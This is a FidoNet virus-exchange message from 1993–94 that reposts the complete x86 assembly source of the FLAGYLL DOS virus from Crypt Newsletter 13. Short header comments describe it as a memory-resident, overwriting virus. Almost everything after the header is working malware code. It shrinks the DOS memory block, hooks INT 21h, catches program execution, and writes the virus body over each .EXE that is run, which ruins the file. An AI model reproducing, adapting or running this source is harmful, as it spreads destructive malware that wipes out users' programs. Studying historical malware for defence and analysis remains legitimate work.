;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 36 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : FLAGYLL.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах)
;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 17:38)
;* To : Bill Dirks
;* Subj : FLAGYLL.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org
;FLAGYLL virus - edited for Crypt Newsletter 13
;FLAGYLL is a memory resident, overwriting virus which
;infects and destroys .EXE files on load.
;It updates the infected files time/date stamps to the time of
;infection so it can easily be followed.
;.EXE's infected by FLAGYLL are destroyed. DOS will either
;refuse to load them or FLAGYLL will become resident
;as they execute. These programs are ruined and can only
;be deleted. Because it is so destructive to files, FLAGYLL cannot
;pose a threat in the wild, and in this respect, it is much
;inferior to the SUSAN virus included in this issue.
.radix 16
cseg segment
model small
assume cs:cseg, ds:cseg, es:cseg
org 100h
oi21 equ endflagyll
filelength equ endflagyll - begin
nameptr equ endflagyll+4
DTA equ endflagyll+8
begin: jmp install_flagyll
; install
install_flagyll:
mov ax,cs ; reduce memory size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last memory
jne cancel ; block
mov ax,ds:[0003]
sub ax,100 ; decrease memory
mov ds:0003,ax
copy_flagyll:
mov bx,ax ; copy to claimed block
mov ax,es ; PSP
add ax,bx ; virus start in memory
mov es,ax
mov cx,offset endflagyll - begin ; cx = length of virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin] ; point to start of virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in memory
hook_21:
mov ds,cx ; hook interrupt 21h
mov si,0084h ;
mov di,offset oi21
mov dx,offset check_exec
lodsw
cmp ax,dx ;
je cancel ; exit, if already installed
stosw
movsw
push es
pop ds
mov ax,2521h ; revector int 21h to virus
int 21h
cancel: ret
check_exec: ; look over loaded files
pushf ; for executables
push es ; push everything onto the
push ds ; stack
push ax
push bx
push dx
cmp ax,04B00h ; is a file being
; executed ?
jne abort ; no, exit
do_infect:
call infect ; then try to infect
abort: ; restore everything
pop dx
pop bx
pop ax
pop ds
pop es
popf
exit:
; exit
jmp dword ptr cs:[oi21]
infect:
jmp over_id ; it's a vanity thing
note: db '-=[Crypt Newsletter 13]=-'
over_id:
mov cs:[name_seg],ds ; this routine
mov cs:[name_off],dx ; essentially grabs
; the name of the file
cld ; clear direction flags
mov word ptr cs:[nameptr],dx ; save pointer to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ; get old DTA
int 21h
push es
push bx
push cs ; set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21h
call host_ident ; find filename for virus
push di
mov si,offset COM_txt ; is extension 'COM' ?
mov cx,3
rep cmpsb
pop di
jz return ; if so, let it pass by
mov si,offset EXE_txt ; is extension .EXE ?
nop
mov cl,3
rep cmpsb
jnz return
do_exe: ; infect host, destroying it
mov ax,4300h ; clear attributes
mov ds,cs:[name_seg]
mov dx,cs:[name_off]
int 21h
and cl,0FEh
mov ax,4301h
int 21h
mov ds,cs:[name_seg] ; open file read/write
mov dx,cs:[name_off]
mov ax,3D02h
int 21h
jc close_file
push cs
pop ds
mov [handle],ax
mov bx,ax
push cs
pop ds
mov ax,4200h ;set pointer to beginning of host
push cs
pop ds
mov bx,[handle] ;handle to BX
xor cx,cx
xor dx,dx
int 21h
mov ah,40 ;write to file
mov cx,filelength ;virus length in cx
mov dx,100 ;start write at beginning of Flagyll
int 21h ;do it
close_file: mov bx,[handle]
mov ah,03Eh ;close file, name -->BX
int 21h
mov ax,4C00h ;exit to DOS
int 21h
return: mov ah,1Ah
pop dx ; restore old DTA
pop ds
int 21H
ret ; let DOS regain control
host_ident: les di,dword ptr cs:[nameptr] ; finds filename for
mov ch,0FFh ; host selection
mov al,0
repnz scasb
sub di,4
ret
EXE_txt db 'EXE',0 ; extension masks
COM_txt db 'COM',0 ; for host selection
name_seg dw ? ;data buffers for
name_off dw ? ; viral use on the fly
handle dw ?
note2: db 'Flagyll' ; virus name
endflagyll:
cseg ends
end begin
;-+- GEcho 1.10+
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/3 Enable 32-bit processing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)